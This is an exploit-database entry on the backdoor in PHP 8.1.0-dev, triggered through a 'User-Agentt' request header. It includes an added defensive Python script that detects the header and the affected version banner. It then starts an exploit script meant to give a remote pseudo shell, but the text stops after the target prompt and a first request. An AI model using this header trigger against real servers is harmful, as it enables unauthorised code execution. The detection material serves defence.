Exploits / Vulnerability Discovered: 2021-06-03
Type: webapps
Platform: php
This exploit / vulnerability, PHP 8.1.0-dev 'User-Agentt' remote code execution, is for educational purposes only; if you use it, you do so at your own risk!
An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.
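A defensive check for the condition described above, as an added example that is not part of the original exploit: it flags any request carrying a User-Agentt header (matched case-insensitively, as HTTP header names are) and any response whose X-Powered-By banner advertises PHP/8.1.0-dev. The function names, the sample messages and the reliance on the X-Powered-By banner are assumptions of this example.

```python
import re

# Header name the page says triggers the backdoor; the doubled "t" is the tell.
BACKDOOR_HEADER = "user-agentt"
# Assumption: the server exposes its version as "X-Powered-By: PHP/<version>".
AFFECTED_BANNER = re.compile(r"PHP/8\.1\.0-dev\b", re.IGNORECASE)

def parse_headers(raw):
    """Return [(lowercased name, value)] from a raw HTTP message head, duplicates kept."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    pairs = []
    for line in head.split("\n")[1:]:  # skip the request or status line
        name, sep, value = line.partition(":")
        if sep:
            pairs.append((name.strip().lower(), value.strip()))
    return pairs

def request_findings(raw_request):
    """Values of every User-Agentt header in a request; an empty list means clean."""
    return [v for n, v in parse_headers(raw_request) if n == BACKDOOR_HEADER]

def server_is_affected(raw_response):
    """True if the response advertises the backdoored build via X-Powered-By."""
    return any(n == "x-powered-by" and AFFECTED_BANNER.match(v) is not None
               for n, v in parse_headers(raw_response))

# Constructed sample messages (not captured traffic).
SAMPLE_CLEAN = "GET / HTTP/1.1\r\nHost: app.example\r\nUser-Agent: curl/8.0\r\n\r\n"
SAMPLE_SUSPECT = ("GET / HTTP/1.1\r\nHost: app.example\r\nUser-Agent: curl/8.0\r\n"
                  "USER-AGENTT: <payload placeholder>\r\n\r\n")
SAMPLE_AFFECTED = ("HTTP/1.1 200 OK\r\nX-Powered-By: PHP/8.1.0-dev\r\n"
                   "Content-Type: text/html\r\n\r\n<html></html>")
SAMPLE_RELEASE = "HTTP/1.1 200 OK\r\nX-Powered-By: PHP/8.1.0\r\n\r\n"

if __name__ == "__main__":
    for label, req in (("clean", SAMPLE_CLEAN), ("suspect", SAMPLE_SUSPECT)):
        hits = request_findings(req)
        print(f"request {label}: {'ALERT ' + repr(hits) if hits else 'ok'}")
    for label, resp in (("dev build", SAMPLE_AFFECTED), ("release", SAMPLE_RELEASE)):
        print(f"response {label}: affected={server_is_affected(resp)}")
```

A missing X-Powered-By header does not show the server is unaffected, since the banner can be switched off; confirm the installed PHP build directly on the host.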
The following exploit uses the backdoor to provide a pseudo shell on the host.
#!/usr/bin/env python3
import os
import re
import requests
host = input("Enter the full host url:\n")
request = requests.Session()
response = request.get(host)